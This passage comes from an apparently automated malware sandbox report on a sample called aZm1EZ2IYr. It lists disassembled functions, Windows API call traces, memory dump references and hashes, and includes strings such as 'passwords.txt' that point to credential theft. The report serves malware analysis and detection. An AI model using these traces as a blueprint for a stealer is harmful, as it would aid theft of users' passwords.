                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                        • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                                                                                                                                        • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                        • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
                                                                                                                                                                        Function 0018DC75 Relevance: 90.4, APIs: 60, Instructions: 399memorystringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0018DB54: lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0018DB90
                                                                                                                                                                          • Part of subcall function 0018DB54: strchr.MSVCRT ref: 0018DBA2
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,75AA5460,?,00000000), ref: 0018DCD9
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0018DCE0
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0018DCF5
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018DCFC
                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0018DD18
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0018DD2A
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018DD37
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0018DD68
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018DD6F
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 0018DD76
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0018DD7D
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0018DD92
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018DD99
                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0018DDAF
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0018DDC1
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018DDC8
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0018DDE6
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018DDED
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 0018DDF4
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0018DDFB
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0018DE10
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018DE17
                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0018DE27
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0018DE39
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018DE40
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0018DE68
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018DE6F
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 0018DE76
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0018DE7D
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0018DE98
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018DE9F
                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0018DEB2
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0018DEC4
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018DECB
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0018DED4
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0018DEEA
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0018DEF1
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0018DF09
                                                                                                                                                                          • Part of subcall function 0018F0FD: std::_Xinvalid_argument.LIBCPMT ref: 0018F113
                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0018DF4A
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0018DF70
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018DF7D
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018DF82
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0018DF91
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0018DF98
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0018DFAC
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018DFB3
                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0018DFC1
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0018DFCE
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018DFD5
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0018E00A
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018E011
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 0018E018
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0018E01F
                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0018E03A
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0018E04C
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018E053
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0018E0F7
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018E0FE
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0018E148
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018E14F
                                                                                                                                                                          • Part of subcall function 0018DB54: strchr.MSVCRT ref: 0018DBC7
                                                                                                                                                                          • Part of subcall function 0018DB54: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0018DCCC), ref: 0018DBE9
                                                                                                                                                                          • Part of subcall function 0018DB54: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0018DBF6
                                                                                                                                                                          • Part of subcall function 0018DB54: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0018DCCC), ref: 0018DBFD
                                                                                                                                                                          • Part of subcall function 0018DB54: strcpy_s.MSVCRT ref: 0018DC44
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 838878465-0
                                                                                                                                                                        • Opcode ID: 882919d8e81d33c751407722a0b8ace999f8bd1d8c44ba410d69c9920007b747
                                                                                                                                                                        • Instruction ID: fdb7c08e700ed32adb2ae2c2a5ff1a1e710e7b16f925f6ddc77f083c3cc67fa6
                                                                                                                                                                        • Opcode Fuzzy Hash: 882919d8e81d33c751407722a0b8ace999f8bd1d8c44ba410d69c9920007b747
                                                                                                                                                                        • Instruction Fuzzy Hash: 6DE1F772C04218AFEF21AFF4EC89AEEBF79AB48700F14456AF215A7152DB3559849F10
                                                                                                                                                                        Function 0018A8EB Relevance: 59.7, APIs: 32, Strings: 2, Instructions: 211stringmemoryfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,001B739C,001B680B), ref: 0018A996
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018A9AE
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018A9B6
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018A9C2
                                                                                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018A9CC
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018A9DE
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018A9EA
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018A9F1
                                                                                                                                                                        • StrStrA.SHLWAPI(0018B7F9,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA02
                                                                                                                                                                        • StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA1C
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA2F
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA39
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73A0,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA45
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA4F
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73A4,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA5B
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA68
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA70
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73A8,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA7C
                                                                                                                                                                        • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA8C
                                                                                                                                                                        • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AA9C
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AAAF
                                                                                                                                                                          • Part of subcall function 0018A7AD: _memset.LIBCMT ref: 0018A7EA
                                                                                                                                                                          • Part of subcall function 0018A7AD: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0018AABC), ref: 0018A805
                                                                                                                                                                          • Part of subcall function 0018A7AD: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0018A80D
                                                                                                                                                                          • Part of subcall function 0018A7AD: _memmove.LIBCMT ref: 0018A890
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AABE
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73AC,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AACA
                                                                                                                                                                        • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AADA
                                                                                                                                                                        • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AAEA
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AAFD
                                                                                                                                                                          • Part of subcall function 0018A7AD: lstrcatA.KERNEL32(001B6801,001B6803,?,00000000,00000000,00000000,00000000,00000014,?,0018AABC), ref: 0018A8BA
                                                                                                                                                                          • Part of subcall function 0018A7AD: lstrcatA.KERNEL32(001B6801,001B680A,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0018AABC), ref: 0018A8D0
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AB0C
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73B0,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AB18
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B73B4,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AB24
                                                                                                                                                                        • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0018B7F9), ref: 0018AB34
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0018AB52
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0018AB81
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$File$lstrcpy$lstrlen$HeapPointer$AllocBinaryCloseCreateCryptHandleProcessReadSizeString_memmove_memset
                                                                                                                                                                        • String ID: passwords.txt$p=
                                                                                                                                                                        • API String ID: 1221571796-223136824
                                                                                                                                                                        • Opcode ID: 4f33dfcd56473ae19e2fbf439fda04511e9bda27bba2a54909f6ee6dde53496d
                                                                                                                                                                        • Instruction ID: 392d76300a6e9cb9884d8a0d23135f7a9a146612e8c5dac2852b9ea61c385c30
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f33dfcd56473ae19e2fbf439fda04511e9bda27bba2a54909f6ee6dde53496d
                                                                                                                                                                        • Instruction Fuzzy Hash: F1715B36502115AFDB03BBA4FC89DAE7FBDEF59301F004412FA01AB1A1DB745A059FA2
                                                                                                                                                                        Function 00188853 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 389memoryfilestringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0019076A: StrCmpCA.SHLWAPI(?,?,?,0018886E,?,?,?), ref: 00190773
                                                                                                                                                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 0018894C
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00192285: _memset.LIBCMT ref: 001922AC
                                                                                                                                                                          • Part of subcall function 00192285: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00192352
                                                                                                                                                                          • Part of subcall function 00192285: TerminateProcess.KERNEL32(00000000,00000000), ref: 00192360
                                                                                                                                                                          • Part of subcall function 00192285: CloseHandle.KERNEL32(00000000), ref: 00192367
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00188AB1
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00188AB8
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR_V128), ref: 00188BA2
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B71E0), ref: 00188BBB
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B71E4), ref: 00188BE3
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00188D03
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00188D1E
                                                                                                                                                                          • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                          • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00188D61
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
